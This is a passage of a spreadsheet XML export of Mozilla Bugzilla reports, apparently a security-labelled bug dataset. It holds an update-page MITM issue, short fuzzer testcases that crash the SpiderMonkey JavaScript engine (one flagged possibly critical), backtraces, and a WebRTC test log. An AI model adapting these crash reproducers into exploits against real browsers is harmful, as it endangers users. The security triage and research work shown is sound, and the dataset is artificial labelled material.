          <t>normal</t>
        </is>
      </c>
      <c r="S5715" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5715" t="n">
        <v>1</v>
      </c>
      <c r="U5715" t="n">
        <v>0</v>
      </c>
      <c r="V5715" t="n">
        <v>33</v>
      </c>
      <c r="W5715" t="inlineStr">
        <is>
          <t>The major update UI displays the contents of the detailURL attribute in the update snippets. We've sandboxed the content to prevent scripts etc, but we appear to load it from an http:// url which is not secure. This means a MITM could easily replace that content. results could be simply a spoof ("click this link" to a non-mozilla site), or the content could redirect (or better, meta refresh) to a URL serving an exe, prompting the user to download a trojan.
Pointed out by Aaron Sigel
https://twitter.com/#!/diretraversal/status/52107274294018048
Release Engineering is probably the wrong component because I don't see any of the release-blocking flags I need. Who would change this content?
Note the entire www.mozilla.com site is available over https so there is no reason not to use it in the link.</t>
        </is>
      </c>
      <c r="X5715" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5716">
      <c r="A5716" t="n">
        <v>690376</v>
      </c>
      <c r="B5716" t="inlineStr">
        <is>
          <t>2011-09-29 08:47:51 -0700</t>
        </is>
      </c>
      <c r="C5716" t="inlineStr">
        <is>
          <t>Crash [@ JSObject::nonNativeSetProperty]</t>
        </is>
      </c>
      <c r="D5716" t="inlineStr">
        <is>
          <t>2015-10-07 18:43:41 -0700</t>
        </is>
      </c>
      <c r="E5716" t="n">
        <v>1</v>
      </c>
      <c r="F5716" t="n">
        <v>1</v>
      </c>
      <c r="G5716" t="n">
        <v>3</v>
      </c>
      <c r="H5716" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5716" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5716" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5716" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5716" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5716" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5716" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5716" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5716" t="inlineStr">
        <is>
          <t>[sg:critical?][qa-] js-triage-needed</t>
        </is>
      </c>
      <c r="Q5716" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5716" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5716" t="inlineStr">
        <is>
          <t>mozilla10</t>
        </is>
      </c>
      <c r="T5716" t="n">
        <v>1</v>
      </c>
      <c r="U5716" t="n">
        <v>0</v>
      </c>
      <c r="V5716" t="n">
        <v>13</v>
      </c>
      <c r="W5716" t="inlineStr">
        <is>
          <t>Created attachment 563425
stack
(function() {
    function b(c) {
        if (c) u = function() {};
        this.x = /x/;
        switch (c) {
        case 4:
        case 6:
        }
        this.r = {}
    }
    for each(let a in [
        new Boolean(true),
        0,
        new Boolean(true),
        function() {},
        new Boolean(true),
        new Boolean(true),
        function() {},
        function() {},
        function() {}
        ]) {
        try {
            new b(a)();
        } catch (e) {}
    }
})()
crashes js opt shell 64-bit on Mac 10.6 on JM changeset 44ef245b8706 with -m, -a and -j at JSObject::nonNativeSetProperty. Testcase should be passed in as a CLI argument to reproduce.
The $pc value seems to be accessing register r11 at a scary address 0xf1c6d7e000000001 so locking s-s till shown otherwise.</t>
        </is>
      </c>
      <c r="X5716" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5717">
      <c r="A5717" t="n">
        <v>1554113</v>
      </c>
      <c r="B5717" t="inlineStr">
        <is>
          <t>2019-05-24 02:53:11 -0700</t>
        </is>
      </c>
      <c r="C5717" t="inlineStr">
        <is>
          <t>Self-hosted JavaScript assertion info: "js/src/builtin/TypedObject.js:255: Unhandled scalar type: 10"</t>
        </is>
      </c>
      <c r="D5717" t="inlineStr">
        <is>
          <t>2019-08-14 02:27:45 -0700</t>
        </is>
      </c>
      <c r="E5717" t="n">
        <v>1</v>
      </c>
      <c r="F5717" t="n">
        <v>1</v>
      </c>
      <c r="G5717" t="n">
        <v>3</v>
      </c>
      <c r="H5717" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5717" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5717" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5717" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5717" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5717" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5717" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5717" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5717" t="inlineStr">
        <is>
          <t>[jsbugmon:update]</t>
        </is>
      </c>
      <c r="Q5717" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5717" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5717" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T5717" t="n">
        <v>1</v>
      </c>
      <c r="U5717" t="n">
        <v>0</v>
      </c>
      <c r="V5717" t="n">
        <v>27</v>
      </c>
      <c r="W5717" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 840b7106d8ae (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --disable-profiling --enable-debug --enable-optimize, run with --fuzzing-safe --ion-offthread-compile=off):
    var T = TypedObject;
    x = T.biguint64;
    var ST = new T.StructType({ x });
    new ST({});
Backtrace:
    received signal SIGSEGV, Segmentation fault.
    #0  intrinsic_AssertionFailed (cx=cx@entry=0x7ffff5f19000, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;) at js/src/vm/SelfHosting.cpp:459
    #1  0x000055555591130f in CallJSNative (cx=0x7ffff5f19000, native=native@entry=0x555555cab2b0 &lt;intrinsic_AssertionFailed(JSContext*, unsigned int, JS::Value*)&gt;, args=...) at js/src/vm/Interpreter.cpp:446
    #2  0x00005555559086d9 in js::InternalCallOrConstruct (cx=&lt;optimized out&gt;, cx@entry=0x7ffff5f19000, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:538
    #3  0x0000555555908e1d in InternalCall (cx=0x7ffff5f19000, args=...) at js/src/vm/Interpreter.cpp:593
    #4  0x00005555558fa0f0 in js::CallFromStack (args=..., cx=&lt;optimized out&gt;) at js/src/vm/Interpreter.cpp:597
    #5  Interpret (cx=0x7ffff5f19000, state=...) at js/src/vm/Interpreter.cpp:3085
    #6  0x0000555555908156 in js::RunScript (cx=0x7ffff5f19000, state=...) at js/src/vm/Interpreter.cpp:423
    #7  0x000055555590899f in js::InternalCallOrConstruct (cx=&lt;optimized out&gt;, cx@entry=0x7ffff5f19000, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:566
    #8  0x0000555555908e1d in InternalCall (cx=0x7ffff5f19000, args=...) at js/src/vm/Interpreter.cpp:593
    #9  0x0000555555908f90 in js::Call (cx=&lt;optimized out&gt;, fval=..., fval@entry=..., thisv=..., thisv@entry=..., args=..., rval=...) at js/src/vm/Interpreter.cpp:609
    #10 0x0000555555cd8796 in js::CallSelfHostedFunction (cx=&lt;optimized out&gt;, name=..., thisv=..., thisv@entry=..., args=..., rval=..., rval@entry=...) at js/src/vm/SelfHosting.cpp:1966
    #11 0x0000555555dc03c4 in ConvertAndCopyTo (cx=&lt;optimized out&gt;, typeObj=typeObj@entry=..., typedObj=typedObj@entry=..., offset=offset@entry=0, name=..., name@entry=..., val=..., val@entry=...) at js/src/builtin/TypedObject.cpp:125
    #12 0x0000555555dcfc7c in ConvertAndCopyTo (val=..., typedObj=..., cx=&lt;optimized out&gt;) at js/src/builtin/TypedObject.cpp:131
    #13 js::TypedObject::construct (cx=&lt;optimized out&gt;, cx@entry=0x7ffff5f19000, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;) at js/src/builtin/TypedObject.cpp:2314
    #14 0x000055555591130f in CallJSNative (cx=0x7ffff5f19000, native=native@entry=0x555555dcf9d0 &lt;js::TypedObject::construct(JSContext*, unsigned int, JS::Value*)&gt;, args=...) at js/src/vm/Interpreter.cpp:446
    [...]
    #27 main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;, envp=&lt;optimized out&gt;) at js/src/shell/js.cpp:11399
    rax	0x555557d01f20	93825033838368
    rbx	0x7fffffffb9d0	140737488337360
    rcx	0x555556b67421	93825015378977
    rdx	0x0	0
    rsi	0x7ffff6eeb770	140737336227696
    rdi	0x7ffff6eea540	140737336223040
    rbp	0x7fffffffba10	140737488337424
    rsp	0x7fffffffb9b0	140737488337328
    r8	0x7ffff6eeb770	140737336227696
    r9	0x7ffff7fe6cc0	140737354034368
    r10	0x58	88
    r11	0x7ffff6b927a0	140737332717472
    r12	0x263933200610	42027112728080
    r13	0x7ffff5f19000	140737319636992
    r14	0x7fffffffba48	140737488337480
    r15	0x7ffff5f4e000	140737319854080
    rip	0x555555cab30c &lt;intrinsic_AssertionFailed(JSContext*, unsigned int, JS::Value*)+92&gt;
    =&gt; 0x555555cab30c &lt;intrinsic_AssertionFailed(JSContext*, unsigned int, JS::Value*)+92&gt;:	movl   $0x0,0x0
       0x555555cab317 &lt;intrinsic_AssertionFailed(JSContext*, unsigned int, JS::Value*)+103&gt;:	ud2</t>
        </is>
      </c>
      <c r="X5717" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5718">
      <c r="A5718" t="n">
        <v>1163852</v>
      </c>
      <c r="B5718" t="inlineStr">
        <is>
          <t>2015-05-11 16:22:18 -0700</t>
        </is>
      </c>
      <c r="C5718" t="inlineStr">
        <is>
          <t>Intermittent test_peerConnection_addSecondVideoStream.html | application terminated with exit code -5</t>
        </is>
      </c>
      <c r="D5718" t="inlineStr">
        <is>
          <t>2016-07-02 10:49:13 -0700</t>
        </is>
      </c>
      <c r="E5718" t="n">
        <v>1</v>
      </c>
      <c r="F5718" t="n">
        <v>1</v>
      </c>
      <c r="G5718" t="n">
        <v>3</v>
      </c>
      <c r="H5718" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5718" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5718" t="inlineStr">
        <is>
          <t>WebRTC</t>
        </is>
      </c>
      <c r="K5718" t="inlineStr">
        <is>
          <t>40 Branch</t>
        </is>
      </c>
      <c r="L5718" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5718" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5718" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5718" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5718" t="inlineStr">
        <is>
          <t>[adv-main39+][adv-esr38.1+]</t>
        </is>
      </c>
      <c r="Q5718" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5718" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5718" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T5718" t="n">
        <v>1</v>
      </c>
      <c r="U5718" t="n">
        <v>0</v>
      </c>
      <c r="V5718" t="n">
        <v>33</v>
      </c>
      <c r="W5718" t="inlineStr">
        <is>
          <t>14:20:55 INFO - ++DOCSHELL 0x96f15800 == 8 [pid = 3573] [id = 49]
14:20:55 INFO - ++DOMWINDOW == 23 (0x971f2c00) [pid = 3573] [serial = 102] [outer = (nil)]
14:20:55 INFO - ++DOMWINDOW == 24 (0x9a0eb400) [pid = 3573] [serial = 103] [outer = 0x971f2c00]
14:20:55 INFO - [Child 3624] WARNING: ENSURE_MAIN_PROCESS failed. Cannot SetCString from content process: media.webrtc.debug.log_file: file /builds/slave/m-in-lx-d-00000000000000000000/build/src/modules/libpref/Preferences.cpp, line 1516
14:20:55 INFO - [Child 3624] WARNING: ENSURE_MAIN_PROCESS failed. Cannot SetCString from content process: media.webrtc.debug.aec_log_dir: file /builds/slave/m-in-lx-d-00000000000000000000/build/src/modules/libpref/Preferences.cpp, line 1516
14:20:56 INFO - [Parent 3573] WARNING: No docshells for remote frames!: file /builds/slave/m-in-lx-d-00000000000000000000/build/src/dom/base/nsFrameLoader.cpp, line 492
14:20:56 INFO - [Parent 3573] WARNING: No docshells for remote frames!: file /builds/slave/m-in-lx-d-00000000000000000000/build/src/dom/base/nsFrameLoader.cpp, line 492
14:20:56 INFO - JavaScript error: chrome://browser/content/webrtcIndicator.js, line 51: TypeError: gStringBundle is undefined
14:20:56 INFO - [Parent 3573] WARNING: Enabling vsync compositor: file /builds/slave/m-in-lx-d-00000000000000000000/build/src/gfx/layers/ipc/CompositorParent.cpp, line 677
14:20:56 INFO - [Parent 3573] ###!!! ASSERTION: /build/buildd/glib2.0-2.32.1/./glib/gmem.c:358: overflow allocating 1515870810*16 bytes: 'glib assertion', file /builds/slave/m-in-lx-d-00000000000000000000/build/src/toolkit/xre/nsSigHandlers.cpp, line 138
14:21:19 INFO - #01: my_glib_log_func [toolkit/xre/nsSigHandlers.cpp:140]
14:21:19 INFO - (firefox:3573): GLib-ERROR **: /build/buildd/glib2.0-2.32.1/./glib/gmem.c:358: overflow allocating 1515870810*16 bytes
14:21:19 INFO - -1323444032[b0f310c0]: [main|sdp_config] sdp_config.c:86: SDP: Initialized config pointer: 0x9e8a4d60
14:21:19 INFO - -1323444032[b0f310c0]: [1431379255029545 (id=2147483742 url=http://mochi.test:8888/tests/dom/media/tests/mochitest/test_peerConnection_addSecondVideoSt]: stable -&gt; have-local-offer
14:21:19 INFO - [Child 3624] WARNING: pipe error (3): Connection reset by peer: file /builds/slave/m-in-lx-d-00000000000000000000/build/src/ipc/chromium/src/chrome/common/ipc_channel_posix.cc, line 459
14:21:19 INFO - [Child 3624] ###!!! ABORT: Aborting on channel error.: file /builds/slave/m-in-lx-d-00000000000000000000/build/src/ipc/glue/MessageChannel.cpp, line 1662
14:21:19 INFO - #01: mozilla::ipc::MessageChannel::OnChannelErrorFromLink() [ipc/glue/MessageChannel.cpp:1662]
14:21:19 INFO - #02: mozilla::ipc::ProcessLink::OnChannelError() [ipc/glue/MessageLink.cpp:405]
14:21:19 INFO - #03: IPC::Channel::ChannelImpl::OnFileCanReadWithoutBlocking(int) [ipc/chromium/src/chrome/common/ipc_channel_posix.cc:879]
14:21:19 INFO - #04: base::MessagePumpLibevent::OnLibeventNotification(int, short, void*) [ipc/chromium/src/base/message_pump_libevent.cc:231]
14:21:19 INFO - #05: event_base_loop [ipc/chromium/src/third_party/libevent/event.c:1350]
14:21:19 INFO - #06: base::MessagePumpLibevent::Run(base::MessagePump::Delegate*) [ipc/chromium/src/base/message_pump_libevent.cc:357]
14:21:19 INFO - #07: MessageLoop::RunInternal() [ipc/chromium/src/base/message_loop.cc:233]
14:21:19 INFO - #08: MessageLoop::Run() [ipc/chromium/src/base/message_loop.cc:517]
14:21:19 INFO - #09: base::Thread::ThreadMain() [ipc/chromium/src/base/thread.cc:173]
14:21:19 INFO - #10: ThreadFunc [ipc/chromium/src/base/platform_thread_posix.cc:41]
14:21:19 INFO - #11: libpthread.so.0 + 0x6d4c
14:21:19 INFO - [Child 3624] ###!!! ABORT: Aborting on channel error.: file /builds/slave/m-in-lx-d-00000000000000000000/build/src/ipc/glue/MessageChannel.cpp, line 1662
14:21:19 INFO - Hit MOZ_CRASH() at /builds/slave/m-in-lx-d-00000000000000000000/build/src/memory/mozalloc/mozalloc_abort.cpp:33
14:21:20 INFO - TEST-INFO | Main app process: killed by out-of-range signal, number 123
14:21:20 INFO - 82 INFO TEST-PASS | dom/media/tests/mochitest/test_peerConnection_addSecondVideoStream.html | A valid string reason is expected
14:21:20 INFO - 83 INFO TEST-PASS | dom/media/tests/mochitest/test_peerConnection_addSecondVideoStream.html | Reason cannot be empty
14:21:20 INFO - 84 INFO Network setup is not required
14:21:20 INFO - 85 INFO Creating PeerConnectionWrapper (pcLocal)
14:21:20 INFO - 86 INFO Creating PeerConnectionWrapper (pcRemote)
14:21:20 INFO - 87 INFO Run step 1: PC_SETUP_SIGNALING_CLIENT
14:21:20 INFO - 88 INFO Run step 2: PC_LOCAL_SETUP_ICE_LOGGER
14:21:20 INFO - 89 INFO Run step 3: PC_REMOTE_SETUP_ICE_LOGGER
14:21:20 INFO - 90 INFO Run step 4: PC_LOCAL_SETUP_SIGNALING_LOGGER
14:21:20 INFO - 91 INFO Run step 5: PC_REMOTE_SETUP_SIGNALING_LOGGER
14:21:20 INFO - 92 INFO Run step 6: PC_LOCAL_SETUP_ADDSTREAM_HANDLER
14:21:20 INFO - 93 INFO Run step 7: PC_REMOTE_SETUP_ADDSTREAM_HANDLER
14:21:20 INFO - 94 INFO Run step 8: PC_LOCAL_CHECK_INITIAL_SIGNALINGSTATE
14:21:20 INFO - 95 INFO TEST-PASS | dom/media/tests/mochitest/test_peerConnection_addSecondVideoStream.html | Initial local signalingState is 'stable'
14:21:20 INFO - 96 INFO Run step 9: PC_REMOTE_CHECK_INITIAL_SIGNALINGSTATE
14:21:20 INFO - 97 INFO TEST-PASS | dom/media/tests/mochitest/test_peerConnection_addSecondVideoStream.html | Initial remote signalingState is 'stable'
14:21:20 INFO - 98 INFO Run step 10: PC_LOCAL_CHECK_INITIAL_ICE_STATE
14:21:20 INFO - 99 INFO TEST-PASS | dom/media/tests/mochitest/test_peerConnection_addSecondVideoStream.html | Initial local ICE connection state is 'new'
14:21:20 INFO - 100 INFO Run step 11: PC_REMOTE_CHECK_INITIAL_ICE_STATE
14:21:20 INFO - 101 INFO TEST-PASS | dom/media/tests/mochitest/test_peerConnection_addSecondVideoStream.html | Initial remote ICE connection state is 'new'
14:21:20 INFO - 102 INFO Run step 12: PC_LOCAL_GUM
14:21:20 INFO - 103 INFO Get 1 local streams
14:21:20 INFO - 104 INFO Call getUserMedia for {"video":true}
14:21:20 INFO - 105 INFO PeerConnectionWrapper (pcLocal) gUM local stream {478b1c81-5d72-41df-96c0-5e9f92b141e7} with video track {46d110b5-d173-48da-a968-af8bdad25f3a}
14:21:20 INFO - 106 INFO Got media stream: video (local)
14:21:20 INFO - 107 INFO PeerConnectionWrapper (pcLocal): "onnegotiationneeded" event fired
14:21:20 INFO - 108 INFO TEST-PASS | dom/media/tests/mochitest/test_peerConnection_addSecondVideoStream.html | addStream adds sender
14:21:20 INFO - 109 INFO TEST-PASS | dom/media/tests/mochitest/test_peerConnection_addSecondVideoStream.html | track has id
14:21:20 INFO - 110 INFO TEST-PASS | dom/media/tests/mochitest/test_peerConnection_addSecondVideoStream.html | track has kind
14:21:20 INFO - 111 INFO Run step 13: PC_REMOTE_GUM
14:21:20 INFO - 112 INFO Get 1 local streams
14:21:20 INFO - 113 INFO Call getUserMedia for {"video":true}
14:21:20 INFO - 114 INFO canplaythrough fired for media element pcLocal_local1_video
14:21:20 INFO - 115 INFO PeerConnectionWrapper (pcRemote) gUM local stream {b8722e28-22b1-4e76-a597-f173e582cffb} with video track {4a224b3d-43b4-4f0b-be1c-2d390b13e39e}
14:21:20 INFO - 116 INFO Got media stream: video (local)
14:21:20 INFO - 117 INFO PeerConnectionWrapper (pcRemote): "onnegotiationneeded" event fired
14:21:20 INFO - 118 INFO TEST-PASS | dom/media/tests/mochitest/test_peerConnection_addSecondVideoStream.html | addStream adds sender
14:21:20 INFO - 119 INFO TEST-PASS | dom/media/tests/mochitest/test_peerConnection_addSecondVideoStream.html | track has id
14:21:20 INFO - 120 INFO TEST-PASS | dom/media/tests/mochitest/test_peerConnection_addSecondVideoStream.html | track has kind
14:21:20 INFO - 121 INFO Run step 14: PC_LOCAL_SETUP_ICE_HANDLER
14:21:20 INFO - 122 INFO Run step 15: PC_REMOTE_SETUP_ICE_HANDLER
14:21:20 INFO - 123 INFO Run step 16: PC_LOCAL_STEEPLECHASE_SIGNAL_EXPECTED_LOCAL_TRACKS
14:21:20 INFO - 124 INFO Run step 17: PC_REMOTE_STEEPLECHASE_SIGNAL_EXPECTED_LOCAL_TRACKS
14:21:20 INFO - 125 INFO Run step 18: PC_LOCAL_GET_EXPECTED_REMOTE_TRACKS 
14:21:20 INFO - 126 INFO Run step 19: PC_REMOTE_GET_EXPECTED_REMOTE_TRACKS
14:21:20 INFO - 127 INFO Run step 20: PC_LOCAL_CREATE_OFFER
14:21:20 INFO - 128 INFO Got offer: {"type":"offer","sdp":"v=0\r\no=mozilla...THIS_IS_SDPARTA-40.0a1 5543845458266036880 0 IN IP4 0.0.0.0\r\ns=-\r\nt=0 0\r\na=fingerprint:sha-256 BA:F1:AD:7C:5C:8B:0C:D8:5E:C9:B4:CF:1F:6A:DA:6A:8B:F4:31:91:D3:58:EB:7C:C1:B3:FE:84:E4:D4:EB:75\r\na=group:BUNDLE sdparta_0\r\na=ice-options:trickle\r\na=msid-semantic:WMS *\r\nm=video 9 RTP/SAVPF 120 126 97\r\nc=IN IP4 0.0.0.0\r\na=sendrecv\r\na=fmtp:120 max-fs=12288;max-fr=60\r\na=fmtp:126 profile-level-id=42e01f;level-asymmetry-allowed=1;packetization-mode=1\r\na=fmtp:97 profile-level-id=42e01f;level-asymmetry-allowed=1\r\na=ice-pwd:d7d27fcd8d71d483c2b5d8946083e374\r\na=ice-ufrag:dbca644f\r\na=mid:sdparta_0\r\na=msid:{478b1c81-5d72-41df-96c0-5e9f92b141e7} {46d110b5-d173-48da-a968-af8bdad25f3a}\r\na=rtcp-fb:120 nack\r\na=rtcp-fb:120 nack pli\r\na=rtcp-fb:120 ccm fir\r\na=rtcp-fb:120 ccm tmmbr\r\na=rtcp-fb:126 nack\r\na=rtcp-fb:126 nack pli\r\na=rtcp-fb:126 ccm fir\r\na=rtcp-fb:126 ccm tmmbr\r\na=rtcp-fb:97 nack\r\na=rtcp-fb:97 nack pli\r\na=rtcp-fb:97 ccm fir\r\na=rtcp-fb:97 ccm tmmbr\r\na=rtcp-mux\r\na=rtpmap:120 VP8/90000\r\na=rtpmap:126 H264/90000\r\na=rtpmap:97 H264/90000\r\na=setup:actpass\r\na=ssrc:3358678933 cname:{36afb69d-826e-4856-a59e-3a7fd6158083}\r\n"}
14:21:20 INFO - 129 INFO TEST-PASS | dom/media/tests/mochitest/test_peerConnection_addSecondVideoStream.html | Local create offer does not change signaling state
14:21:20 INFO - 130 INFO Run step 21: PC_LOCAL_STEEPLECHASE_SIGNAL_OFFER
14:21:20 INFO - 131 INFO Run step 22: PC_LOCAL_SET_LOCAL_DESCRIPTION
14:21:20 INFO - 132 INFO PeerConnectionWrapper (pcLocal): "onsignalingstatechange" event fired
14:21:20 INFO - 133 INFO PeerConnectionWrapper (pcLocal): 'signalingstatechange' event received
14:21:20 INFO - 134 INFO TEST-PASS | dom/media/tests/mochitest/test_peerConnection_addSecondVideoStream.html | PeerConnectionWrapper (pcLocal): legal signaling state transition from stable to have-local-offer
14:21:20 INFO - 135 INFO PeerConnectionWrapper (pcLocal): Successfully set the local description
14:21:20 INFO - 136 INFO TEST-PASS | dom/media/tests/mochitest/test_peerConnection_addSecondVideoStream.html | signalingState after local setLocalDescription is 'have-local-offer'
14:21:20 INFO - 137 INFO Run step 23: PC_REMOTE_GET_OFFER
14:21:20 INFO - 138 INFO Run step 24: PC_REMOTE_SET_REMOTE_DESCRIPTION
14:21:20 WARNING - TEST-UNEXPECTED-FAIL | dom/media/tests/mochitest/test_peerConnection_addSecondVideoStream.html | application terminated with exit code -5
14:21:20 INFO - runtests.py | Application ran for: 0:04:26.759346
14:21:20 INFO - zombiecheck | Reading PID log: /tmp/tmpsHEvnLpidlog
14:21:20 INFO - ==&gt; process 3573 launched child process 3624
14:21:20 INFO - zombiecheck | Checking for orphan process with PID: 3624
14:21:20 INFO - Stopping web server
14:21:20 INFO - Stopping web socket server
14:21:20 INFO - Stopping ssltunnel
14:21:20 INFO - TEST-INFO | leakcheck | default process: leak threshold set at 0 bytes
14:21:20 INFO - TEST-INFO | leakcheck | plugin process: leak threshold set at 0 bytes
14:21:20 INFO - TEST-INFO | leakcheck | tab process: leak threshold set at 25000 bytes
14:21:20 INFO - TEST-INFO | leakcheck | geckomediaplugin process: leak threshold set at 20000 bytes
14:21:20 WARNING - TEST-UNEXPECTED-FAIL | leakcheck | tab process: missing output line for total leaks!
14:21:20 INFO - TEST-INFO | leakcheck | missing output line from log file /tmp/tmpM6NVJK.mozrunner/runtests_leaks_tab_pid3624.log
14:21:20 WARNING - TEST-UNEXPECTED-FAIL | leakcheck | default process: missing output line for total leaks!
14:21:20 INFO - TEST-INFO | leakcheck | missing output line from log file /tmp/tmpM6NVJK.mozrunner/runtests_leaks.log
14:21:20 INFO - runtests.py | Running tests: end.
14:21:20 INFO - SUITE-END | took 280s
14:21:20 ERROR - Return code: 251
14:21:20 ERROR - No tests run or test summary not found
14:21:20 INFO - TinderboxPrint: mochitest-plain-chunked&lt;br/&gt;&lt;em class="testfail"&gt;T-FAIL&lt;/em&gt;
14:21:20 WARNING - # TBPL FAILURE #
14:21:20 WARNING - The mochitest suite: plain-chunked ran with return status: FAILURE
14:21:20 INFO - Running post-action listener: _package_coverage_data
14:21:20 INFO - Running post-action listener: _resource_record_post_action
14:21:20 INFO - Running post-run listener: _resource_record_post_run
14:21:21 INFO - Total resource usage - Wall time: 305s; CPU: 100.0%; Read bytes: 2818048; Write bytes: 168591360; Read time: 100; Write time: 253432
14:21:21 INFO - install - Wall time: 24s; CPU: 100.0%; Read bytes: 0; Write bytes: 98234368; Read time: 0; Write time: 205244
14:21:21 INFO - run-tests - Wall time: 282s; CPU: 100.0%; Read bytes: 2785280; Write bytes: 62238720; Read time: 100; Write time: 24496
14:21:21 INFO - Running post-run listener: _upload_blobber_files
14:21:21 INFO - Blob upload gear active.</t>
        </is>
      </c>
      <c r="X5718" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5719">
      <c r="A5719" t="n">
        <v>185944</v>
      </c>
      <c r="B5719" t="inlineStr">
        <is>
          <t>2002-12-17 22:34:29 -0800</t>
        </is>
      </c>
      <c r="C5719" t="inlineStr">
        <is>
          <t>radio buttons for groups all have the same name in change-multiple</t>
        </is>
      </c>
      <c r="D5719" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:34 -0800</t>
        </is>
      </c>
      <c r="E5719" t="n">
        <v>1</v>
      </c>
      <c r="F5719" t="n">
        <v>1</v>
      </c>
      <c r="G5719" t="n">
        <v>4</v>
      </c>
      <c r="H5719" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5719" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5719" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K5719" t="inlineStr">
        <is>
          <t>2.17.1</t>
        </is>
      </c>
      <c r="L5719" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5719" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5719" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5719" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5719" t="inlineStr"/>
      <c r="Q5719" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5719" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5719" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T5719" t="n">
        <v>1</v>
      </c>
      <c r="U5719" t="n">
        <v>0</v>
      </c>
      <c r="V5719" t="n">
        <v>5</v>
      </c>
      <c r="W5719" t="inlineStr">
        <is>
          <t>Went to do a mass-change and noticed only one radio button was checked out of my
list of 20 groups in the "don't change, add, remove" list of the groups.  Tried
to check another one and it unchecked the one that was checked.
View-source shows they're all named "bit-" with no number on the end.
Not sure what this is a regression from, but somebody changed something they
shouldn't have, by the look of it. :)
Patch to follow shortly</t>
        </is>
      </c>
      <c r="X5719" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5720">
      <c r="A5720" t="n">
        <v>1281041</v>
      </c>
      <c r="B5720" t="inlineStr">
        <is>
          <t>2016-06-20 13:14:16 -0700</t>
        </is>
      </c>
      <c r="C5720" t="inlineStr">
        <is>
          <t>Heap overread in libical icalparser_parse_string -&gt; parser_get_next_char</t>
        </is>
      </c>
      <c r="D5720" t="inlineStr">
        <is>
          <t>2024-05-30 09:18:32 -0700</t>
        </is>
      </c>
      <c r="E5720" t="n">
        <v>1</v>
      </c>
      <c r="F5720" t="n">
        <v>1</v>
      </c>
      <c r="G5720" t="n">
        <v>2</v>
      </c>
      <c r="H5720" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5720" t="inlineStr">
        <is>
          <t>Calendar</t>
        </is>
      </c>
      <c r="J5720" t="inlineStr">
        <is>
          <t>Internal Components</t>
        </is>
      </c>
      <c r="K5720" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5720" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5720" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5720" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5720" t="inlineStr">
